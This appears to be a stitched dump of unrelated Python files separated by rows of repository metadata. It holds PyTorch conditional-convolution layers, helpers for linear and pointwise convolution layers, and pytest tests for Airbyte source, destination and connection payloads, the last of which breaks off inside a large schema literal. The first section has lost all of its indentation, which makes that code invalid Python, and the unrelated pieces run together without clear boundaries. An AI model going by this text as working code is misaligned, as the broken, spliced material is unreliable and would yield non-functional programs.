# kernel = torch.sum(attention[:, None, None, None, None, :] * self.weight[None, :, :, :, :, :], 5)
batchsize = x.size(0)
kernel = torch.zeros(batchsize, self.weight.shape[0], self.weight.shape[1], self.weight.shape[2],
self.weight.shape[3]).cuda()
for i in range(self.num_workers):
kernel += attention[:, None, None, None, None, i] * self.weight[None, :, :, :, :, i]
output = []
inputs = torch.split(x, 1, 0)
if self.isbias:
# biases = torch.sum(attention[:, None, :] * self.bias[None, :, :], 2)
biases = torch.zeros(batchsize, self.bias.shape[0]).cuda()
for i in range(self.num_workers):
biases += attention[:, None, i] * self.bias[None, :, i]
for input_tensor, one_kernel, one_bias in zip(inputs, kernel, biases):
t_out = nn.functional.conv2d(input_tensor, one_kernel, one_bias, self.stride, self.padding,
self.dilation,
self.groups)
output.append(t_out)
else:
for input_tensor, one_kernel in zip(inputs, kernel):
t_out = nn.functional.conv2d(input_tensor, one_kernel, None, self.stride, self.padding, self.dilation,
self.groups)
output.append(t_out)
return torch.cat(output, dim=0)
class EfficientCondConv2d(_ConvNd):
def __init__(self, in_channels, out_channels, kernel_size, att_inchannel, stride=1, num_workers=8, padding=0,
dilation=1, dropout_rate=0.1, groups=1, bias=True, padding_mode='zeros'):
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
self.isbias = bias
super(EfficientCondConv2d, self).__init__(
in_channels, out_channels * num_workers, kernel_size, stride, padding, dilation,
False, _single(0), groups, bias, padding_mode)
if num_workers < 1:
raise ValueError('num_workers must be positive integer')
self.num_workers = num_workers
self.weight = nn.Parameter(self.weight.view(num_workers, -1))
if bias:
self.bias = nn.Parameter(self.bias.view(num_workers, -1))
self.att_linear1 = nn.Linear(att_inchannel, in_channels)
self.att_linear2 = nn.Linear(in_channels, in_channels)
self.att_linear = nn.Linear(in_channels, num_workers)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, x, att_x, att_with_x: bool = True): # batchsize * 512 * 16 batchsize * 512
if att_with_x:
# 结合x
mix_feature = torch.tanh(
self.att_linear1(att_x) + self.att_linear2(nn.functional.adaptive_avg_pool2d(x, (1, 1)).squeeze()))
else:
# 单纯使用word
mix_feature = torch.tanh(self.att_linear1(att_x))
attention = nn.functional.softmax(self.att_linear(mix_feature), dim=1)
attention = self.dropout(attention) # batchsize * num_workers
kernel = torch.matmul(attention, self.weight).view(-1, self.out_channels // self.num_workers, self.in_channels,
self.kernel_size[0],
self.kernel_size[1]) # batchsize * xxxx
output = []
inputs = torch.split(x, 1, 0)
if self.isbias:
bias = torch.matmul(attention, self.bias).view(-1, self.out_channels // self.num_workers)
for i, input_tensor in enumerate(inputs):
t_out = nn.functional.conv2d(input_tensor, kernel[i, :, :, :, :], bias[i, :], self.stride,
self.padding, self.dilation, self.groups)
output.append(t_out)
else:
for i, input_tensor in enumerate(inputs):
t_out = nn.functional.conv2d(input_tensor, kernel[i, :, :, :, :], None, self.stride, self.padding,
self.dilation, self.groups)
output.append(t_out)
return torch.cat(output, dim=0)
class MoreEfficientCondConv2d(_ConvNd):
def __init__(self, in_channels, out_channels, kernel_size, att_inchannel, stride=1, num_workers=8, padding=0,
dilation=1, dropout_rate=0.1, groups=1, bias=True, padding_mode='zeros'):
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
self.isbias = bias
super(MoreEfficientCondConv2d, self).__init__(
in_channels, out_channels * num_workers, kernel_size, stride, padding, dilation,
False, _single(0), groups, bias, padding_mode)
if num_workers < 1:
raise ValueError('num_workers must be positive integer')
self.true_out_channels = out_channels
self.weight = nn.Parameter(self.weight.view(num_workers, -1))
if bias:
self.bias = nn.Parameter(self.bias.view(num_workers, -1))
self.att_linear1 = nn.Linear(att_inchannel, in_channels)
self.att_linear2 = nn.Linear(in_channels, in_channels)
self.att_linear = nn.Linear(in_channels, num_workers)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, x, att_x, att_with_x: bool = True,
att_with_att: bool = True): # batchsize * 512 * 16 * 16 batchsize * 512
if att_with_x and att_with_att:
# 结合x
mix_feature = torch.tanh(
self.att_linear1(att_x) + self.att_linear2(nn.functional.adaptive_avg_pool2d(x, (1, 1)).squeeze(2).squeeze(2)))
elif not att_with_x and att_with_att:
# 单纯使用word
mix_feature = torch.tanh(self.att_linear1(att_x))
elif att_with_x and not att_with_att:
mix_feature = torch.tanh(self.att_linear2(nn.functional.adaptive_avg_pool2d(x, (1, 1)).squeeze(2).squeeze(2)))
else:
raise Exception('must have attention in condconv')
attention = nn.functional.softmax(self.att_linear(mix_feature), dim=1)
attention = self.dropout(attention) # batchsize * num_workers
kernel = torch.matmul(attention, self.weight).view(-1, self.in_channels, self.kernel_size[0],
self.kernel_size[1])
b, c, w, h = x.size()
inputs = x.view(1, -1, w, h)
if self.isbias:
bias = torch.matmul(attention, self.bias).view(-1)
else:
bias = None
t_out = nn.functional.conv2d(inputs, kernel, bias, self.stride, self.padding, self.dilation, b)
output = t_out.view(b, self.true_out_channels, t_out.size(2), t_out.size(3))
return output
class LittleMoreEfficientCondConv2d(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, att_inchannel, stride=1, num_workers=8, padding=0,
dilation=1, dropout_rate=0.1, groups=1, bias=True, padding_mode='zeros'):
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = _pair(kernel_size)
self.stride = _pair(stride)
self.padding = _pair(padding)
self.dilation = _pair(dilation)
self.isbias = bias
super(LittleMoreEfficientCondConv2d, self).__init__()
if num_workers < 1:
raise ValueError('num_workers must be positive integer')
self.true_out_channels = out_channels
self.weight_linear = nn.Linear(num_workers,
out_channels * in_channels * self.kernel_size[0] *
self.kernel_size[1], bias=False)
if bias:
self.bias_linear = nn.Linear(num_workers, out_channels, bias=False)
self.att_linear1 = nn.Linear(att_inchannel, in_channels)
self.att_linear2 = nn.Linear(in_channels, in_channels)
self.att_linear = nn.Linear(in_channels, num_workers)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, x, att_x, att_with_x: bool = True): # batchsize * 512 * 16 * 16 batchsize * 512
if att_with_x:
# 结合x
mix_feature = torch.tanh(
self.att_linear1(att_x) + self.att_linear2(nn.functional.adaptive_avg_pool2d(x, (1, 1)).squeeze()))
else:
# 单纯使用word
mix_feature = torch.tanh(self.att_linear1(att_x))
attention = nn.functional.softmax(self.att_linear(mix_feature), dim=1)
attention = self.dropout(attention) # batchsize * num_workers
kernel = self.weight_linear(attention).view(-1, self.in_channels, self.kernel_size[0], self.kernel_size[1])
if self.isbias:
bias = self.bias_linear(attention).view(-1)
else:
bias = None
b, c, w, h = x.size()
inputs = x.view(1, -1, w, h)
t_out = nn.functional.conv2d(inputs, kernel, bias, self.stride, self.padding, self.dilation, b)
output = t_out.view(b, self.true_out_channels, t_out.size(2), t_out.size(3))
return output | 43.470588 | 127 | 0.606225 | 1,762 | 14,041 | 4.598751 | 0.067537 | 0.06294 | 0.037517 | 0.033691 | 0.891522 | 0.869184 | 0.86289 | 0.845243 | 0.83142 | 0.823399 | 0 | 0.020668 | 0.283242 | 14,041 | 323 | 128 | 43.470588 | 0.784479 | 0.066235 | 0 | 0.726087 | 0 | 0 | 0.018039 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.017391 | 0 | 0.104348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c89b95293509a2424ba4dd5796861f31047f9325 | 3,433 | py | Python | ckconv/nn/linear.py | boczekbartek/flexconv | 610b5be3a846bcc1436275daaad89482b6b8e7cc | [
"BSD-2-Clause"
] | 41 | 2021-10-19T03:13:39.000Z | 2022-03-31T17:08:14.000Z | ckconv/nn/linear.py | boczekbartek/flexconv | 610b5be3a846bcc1436275daaad89482b6b8e7cc | [
"BSD-2-Clause"
] | 3 | 2021-10-19T17:32:14.000Z | 2021-12-23T02:42:07.000Z | ckconv/nn/linear.py | boczekbartek/flexconv | 610b5be3a846bcc1436275daaad89482b6b8e7cc | [
"BSD-2-Clause"
] | 3 | 2021-11-01T14:29:35.000Z | 2022-03-30T00:36:50.000Z | import torch
import torch.nn as nn
import math
def Linear1d(
in_channels: int,
out_channels: int,
stride: int = 1,
bias: bool = True,
) -> torch.nn.Module:
"""
Implements a Linear Layer in terms of a point-wise convolution.
"""
return nn.Conv1d(in_channels, out_channels, kernel_size=1, stride=stride, bias=bias)
def Linear2d(
in_channels: int,
out_channels: int,
stride: int = 1,
bias: bool = True,
) -> torch.nn.Module:
"""
Implements a Linear Layer in terms of a point-wise convolution.
"""
return nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=stride, bias=bias)
def Linear3d(
in_channels: int,
out_channels: int,
stride: int = 1,
bias: bool = True,
) -> torch.nn.Module:
"""
Implements a Linear Layer in terms of a point-wise convolution.
"""
return nn.Conv3d(in_channels, out_channels, kernel_size=1, stride=stride, bias=bias)
class MultipliedLinear1d(torch.nn.Conv1d):
def __init__(
self,
in_channels: int,
out_channels: int,
omega_0: float,
learn_omega_0: bool,
bias: bool,
):
"""
Implements a Linear Layer of the form y = omega_0 * W x + b, where x is 1 dimensional
"""
super(MultipliedLinear1d, self).__init__(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
stride=1,
padding=0,
dilation=1,
bias=bias,
)
# omega_0
if learn_omega_0:
self.omega_0 = torch.nn.Parameter(torch.Tensor(1))
with torch.no_grad():
self.omega_0.fill_(omega_0)
else:
tensor_omega_0 = torch.zeros(1)
tensor_omega_0.fill_(omega_0)
self.register_buffer("omega_0", tensor_omega_0)
def forward(self, x: torch.Tensor) -> torch.Tensor:
out = self.omega_0 * torch.nn.functional.conv1d(
x, weight=self.weight, bias=None, stride=1, padding=0
)
if self.bias is not None:
out = out + self.bias.view(1, -1, *((out.ndim - 2) * [1]))
return out
class MultipliedLinear2d(torch.nn.Conv2d):
def __init__(
self,
in_channels: int,
out_channels: int,
omega_0: float,
learn_omega_0: bool,
bias: bool,
):
"""
Implements a Linear Layer of the form y = omega_0 * W x + b, where x is 2 dimensional
"""
super(MultipliedLinear2d, self).__init__(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
stride=1,
padding=0,
dilation=1,
bias=bias,
)
# omega_0
if learn_omega_0:
self.omega_0 = torch.nn.Parameter(torch.Tensor(1))
with torch.no_grad():
self.omega_0.fill_(omega_0)
else:
tensor_omega_0 = torch.zeros(1)
tensor_omega_0.fill_(omega_0)
self.register_buffer("omega_0", tensor_omega_0)
def forward(self, x: torch.Tensor) -> torch.Tensor:
out = self.omega_0 * torch.nn.functional.conv2d(
x, weight=self.weight, bias=None, stride=1, padding=0
)
if self.bias is not None:
out = out + self.bias.view(1, -1, *((out.ndim - 2) * [1]))
return out
| 28.139344 | 93 | 0.572677 | 445 | 3,433 | 4.213483 | 0.166292 | 0.0896 | 0.070933 | 0.042667 | 0.8736 | 0.8736 | 0.8736 | 0.8736 | 0.8736 | 0.8736 | 0 | 0.03176 | 0.321293 | 3,433 | 121 | 94 | 28.371901 | 0.772961 | 0.11069 | 0 | 0.788889 | 0 | 0 | 0.00473 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077778 | false | 0 | 0.033333 | 0 | 0.188889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c89ea0a2eeb4d4099f5ea59ccc813625286f4520 | 50,469 | py | Python | tests/test_airbyte_dto_factory.py | garden-of-delete/airbyte-tentacle | 6ad7bbf41f4707fe8868e62cc3b22593f68093d5 | [
"Unlicense"
] | 9 | 2021-06-19T06:44:33.000Z | 2021-10-09T21:54:18.000Z | tests/test_airbyte_dto_factory.py | garden-of-delete/airbyte-tentacle | 6ad7bbf41f4707fe8868e62cc3b22593f68093d5 | [
"Unlicense"
] | 10 | 2021-06-11T08:36:04.000Z | 2021-10-08T01:31:56.000Z | tests/test_airbyte_dto_factory.py | garden-of-delete/airbyte-tentacle | 6ad7bbf41f4707fe8868e62cc3b22593f68093d5 | [
"Unlicense"
] | 1 | 2021-06-29T16:34:31.000Z | 2021-06-29T16:34:31.000Z | import pytest
from tests.test_fixtures import *
def test_source_dto__to_payload(dummy_source_dto):
"""
Test SourceDto.to_payload
Verifies the data is not mutated by to_payload
"""
payload = dummy_source_dto.to_payload()
assert payload['sourceDefinitionId'] == 'ef69ef6e-aa7f-4af1-a01d-ef775033524e'
assert payload['sourceId'] == '7d95ec85-47c6-42d4-a7a2-8e5c22c810d2'
assert payload['workspaceId'] == 'f3b9e848-790c-4cdd-a475-5c6bb156dc10'
assert payload['connectionConfiguration'] == {'access_token': '**********'}
assert payload['name'] == 'apache/superset'
assert payload['sourceName'] == 'GitHub'
def test_destination_dto__to_payload(dummy_destination_dto):
"""
Test DestinationDto.to_payload
Verifies the data is not mutated by to_payload
"""
payload = dummy_destination_dto.to_payload()
assert payload['destinationDefinitionId'] == '25c5221d-dce2-4163-ade9-739ef790f503'
assert payload['destinationId'] == 'a41cb2f8-fcce-4c91-adfe-37c4586609f5'
assert payload['workspaceId'] == 'f3b9e848-790c-4cdd-a475-5c6bb156dc10'
assert payload['connectionConfiguration']['database'] == 'postgres'
assert payload['connectionConfiguration']['host'] == 'hostname.com'
assert payload['connectionConfiguration']['schema'] == 'demo'
assert payload['connectionConfiguration']['username'] == 'devrel_master'
assert payload['name'] == 'devrel-rds'
assert payload['destinationName'] == 'Postgres'
def test_connection_dto__to_payload(dummy_connection_dto):
"""
Test ConnectionDto.to_payload
Verifies the data is not mutated by to_payload
"""
payload = dummy_connection_dto.to_payload()
assert payload['connectionId'] == '10290824-9305-47cc-8966-6dd032abd3c0'
assert payload['sourceId'] == '7d95ec85-47c6-42d4-a7a2-8e5c22c810d2'
assert payload['destinationId'] == 'a41cb2f8-fcce-4c91-adfe-37c4586609f5'
assert payload['name'] == 'superset-to-postgres'
assert payload['prefix'] == 'github_superset_'
assert payload['schedule'] == {'units': 24, 'timeUnit': 'hours'}
assert payload['status'] == 'active'
assert payload['syncCatalog'] == {'streams': [{'stream': {'name': 'assignees', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'repository': {'type': ['string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'assignees', 'selected': True}}, {'stream': {'name': 'branches', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'name': {'type': ['null', 'string']}, 'commit': {'type': ['null', 'object'], 'properties': {'sha': {'type': ['null', 'string']}, 'url': {'type': ['null', 'string']}}}, 'protected': {'type': ['null', 'boolean']}, 'protection': {'type': ['null', 'object'], 'properties': {'required_status_checks': {'type': ['null', 'object'], 'properties': {'contexts': {'type': ['null', 'array'], 'items': [{'type': ['null', 'string']}, {'type': ['null', 'string']}]}, 'enforcement_level': {'type': ['null', 'string']}}}}}, 'repository': {'type': ['string']}, 'protection_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [], 'aliasName': 'branches', 'selected': True}}, {'stream': {'name': 'collaborators', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'repository': {'type': ['string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'permissions': {'type': ['null', 'object'], 'properties': {'pull': {'type': ['null', 'boolean']}, 'push': {'type': ['null', 'boolean']}, 'admin': {'type': ['null', 'boolean']}}}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'collaborators', 'selected': True}}, {'stream': {'name': 'comments', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'body': {'type': ['null', 'string']}, 'user': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'node_id': {'type': ['null', 'string']}, 'user_id': {'type': ['null', 'integer']}, 'html_url': {'type': ['null', 'string']}, 'issue_url': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'repository': {'type': ['string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'author_association': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['updated_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['updated_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'comments', 'selected': True}}, {'stream': {'name': 'commit_comments', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'body': {'type': ['null', 'string']}, 'line': {'type': ['null', 'integer']}, 'path': {'type': ['null', 'string']}, 'user': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'position': {'type': ['null', 'integer']}, 'commit_id': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'repository': {'type': ['string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'author_association': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['updated_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['updated_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'commit_comments', 'selected': True}}, {'stream': {'name': 'commits', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'sha': {'type': ['null', 'string']}, 'url': {'type': ['null', 'string']}, 'commit': {'type': ['null', 'object'], 'properties': {'url': {'type': ['null', 'string']}, 'tree': {'type': ['null', 'object'], 'properties': {'sha': {'type': ['null', 'string']}, 'url': {'type': ['null', 'string']}}}, 'author': {'type': ['null', 'object'], 'properties': {'date': {'type': ['null', 'string'], 'format': 'date-time'}, 'name': {'type': ['null', 'string']}, 'email': {'type': ['null', 'string']}}}, 'message': {'type': ['null', 'string']}, 'committer': {'type': ['null', 'object'], 'properties': {'date': {'type': ['null', 'string'], 'format': 'date-time'}, 'name': {'type': ['null', 'string']}, 'email': {'type': ['null', 'string']}}}, 'verification': {'type': ['null', 'object'], 'properties': {'reason': {'type': ['null', 'string']}, 'payload': {'type': ['null', 'string']}, 'verified': {'type': ['null', 'boolean']}, 'signature': {'type': ['null', 'string']}}}, 'comment_count': {'type': ['null', 'integer']}}}, 'node_id': {'type': ['null', 'string']}, 'parents': {'type': ['null', 'array'], 'items': {'type': ['null', 'object'], 'properties': {'sha': {'type': ['null', 'string']}, 'url': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}}}}, 'html_url': {'type': ['null', 'string']}, 'author_id': {'type': ['null', 'integer']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'repository': {'type': ['string']}, 'comments_url': {'type': ['null', 'string']}, 'committer_id': {'type': ['null', 'integer']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['created_at'], 'sourceDefinedPrimaryKey': [['sha']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['created_at'], 'destinationSyncMode': 'append', 'primaryKey': [['sha']], 'aliasName': 'commits', 'selected': True}}, {'stream': {'name': 'events', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'org_id': {'type': ['null', 'integer']}, 'public': {'type': ['null', 'boolean']}, 'payload': {'type': ['null', 'object'], 'properties': {}}, 'repo_id': {'type': ['null', 'integer']}, 'actor_id': {'type': ['null', 'integer']}, 'created_at': {'type': ['null', 'string']}, 'repository': {'type': ['string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['created_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['created_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'events', 'selected': True}}, {'stream': {'name': 'issue_events', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'event': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'actor_id': {'type': ['null', 'integer']}, 'issue_id': {'type': ['null', 'integer']}, 'commit_id': {'type': ['null', 'string']}, 'commit_url': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'repository': {'type': ['string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['created_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['created_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'issue_events', 'selected': True}}, {'stream': {'name': 'issue_labels', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'name': {'type': ['null', 'string']}, 'color': {'type': ['null', 'string']}, 'default': {'type': ['null', 'boolean']}, 'node_id': {'type': ['null', 'string']}, 'repository': {'type': ['string']}, 'description': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'issue_labels', 'selected': True}}, {'stream': {'name': 'issue_milestones', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'state': {'type': ['null', 'string']}, 'title': {'type': ['null', 'string']}, 'due_on': {'type': ['null', 'string'], 'format': 'date-time'}, 'number': {'type': ['null', 'integer']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'closed_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'creator_id': {'type': ['null', 'integer']}, 'labels_url': {'type': ['null', 'string']}, 'repository': {'type': ['string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'description': {'type': ['null', 'string']}, 'open_issues': {'type': ['null', 'integer']}, 'closed_issues': {'type': ['null', 'integer']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['updated_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['updated_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'issue_milestones', 'selected': True}}, {'stream': {'name': 'issues', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'body': {'type': ['null', 'string']}, 'user': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'state': {'type': ['null', 'string']}, 'title': {'type': ['null', 'string']}, 'labels': {'type': ['null', 'array'], 'items': {'type': ['null', 'integer']}}, 'locked': {'type': ['null', 'boolean']}, 'number': {'type': ['null', 'integer']}, 'node_id': {'type': ['null', 'string']}, 'user_id': {'type': ['null', 'integer']}, 'comments': {'type': ['null', 'integer']}, 'html_url': {'type': ['null', 'string']}, 'assignees': {'type': ['null', 'array'], 'items': {'type': ['null', 'integer']}}, 'closed_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'events_url': {'type': ['null', 'string']}, 'labels_url': {'type': ['null', 'string']}, 'repository': {'type': ['string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'assignee_id': {'type': ['null', 'integer']}, 'comments_url': {'type': ['null', 'string']}, 'milestone_id': {'type': ['null', 'integer']}, 'pull_request': {'type': ['null', 'object'], 'properties': {'url': {'type': ['null', 'string']}, 'diff_url': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'patch_url': {'type': ['null', 'string']}}}, 'repository_url': {'type': ['null', 'string']}, 'active_lock_reason': {'type': ['null', 'string']}, 'author_association': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['updated_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['updated_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 